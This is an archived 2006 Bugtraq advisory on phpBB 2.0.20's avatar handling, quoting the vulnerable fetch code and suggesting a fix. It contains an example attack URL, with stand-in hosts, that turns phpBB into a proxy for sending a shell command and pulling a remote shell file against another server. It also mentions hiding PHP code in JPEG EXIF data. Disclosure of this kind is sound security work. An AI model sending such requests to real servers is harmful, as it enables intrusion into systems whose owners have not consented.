lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: 12 May 2006 19:32:48 -0000
From: rgod@...istici.org
To: bugtraq@...urityfocus.com
Subject: PHPBB 2.0.20 persistent issues with avatars


PHPBB 2.0.20 multiple issues with avatars

some problems persistently lie in the way it handles remote and uploaded avatars:

a remote user can:
 
(1) saturate the server with unuseful files, 'cause phpbb do not delete
the previous one when you upload a new avatar

(2) use PhpBB installations to launch exploits against other servers,
using "avatarurl" argument when you modify your profile as path
of a GET request.

Look usercp_avatar.php near lines 125-153:
...
if ( $avatar_mode == 'remote' && preg_match('/^(http:\/\/)?([\w\-\.]+)\:?([0-9]*)\/(.*)$/', $avatar_filename, $url_ary) )
	{
		if ( empty($url_ary[4]) )
		{
			$error = true;
			$error_msg = ( !empty($error_msg) ) ? $error_msg . '<br />' . $lang['Incomplete_URL'] : $lang['Incomplete_URL'];
			return;
		}

		$base_get = '/' . $url_ary[4];
		$port = ( !empty($url_ary[3]) ) ? $url_ary[3] : 80;

		if ( !($fsock = @fsockopen($url_ary[2], $port, $errno, $errstr)) )
		{
			$error = true;
			$error_msg = ( !empty($error_msg) ) ? $error_msg . '<br />' . $lang['No_connection_URL'] : $lang['No_connection_URL'];
			return;
		}

		@fputs($fsock, "GET $base_get HTTP/1.1\r\n");
		@fputs($fsock, "HOST: " . $url_ary[2] . "\r\n");
		@fputs($fsock, "Connection: close\r\n\r\n");

		unset($avatar_data);
		while( !@...f($fsock) )
		{
			$avatar_data .= @fread($fsock, $board_config['avatar_filesize']);
		}
		@fclose($fsock);
...

phpbb do not check if the user supplied value ends with an image extension, neither
checks if the supplied string contains "&" and "?" chars. So, you can submit a value
like this:

http://some_vulnerable.host/somescript.php?cmd=ls%20-la&xpl=http://somehost/someshell.txt

phpbb will launch a GET request like this:

GET /somescript.php?cmd=ls%20-la&xpl=http://somehost/someshell.txt HTTP/1.0
HOST: some_vulnerable.host
Connection: close
 
obviously you have no output, but this makes phpbb to be like a http proxy

(3) inject some php code inside jpeg files as EXIF metadata content:
this, in combinations with third party vulnerable code can be used
to compromise the server where PHP is installed. 
Should be enough to check for php code inside the temporary files
before to copy the new avatar in "images/avatars/" folder.

rgod
---------------------------------------------------------------------------------
mail: rgod [at] autistici [dot] org
site: http://retrogod.altervista.org

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ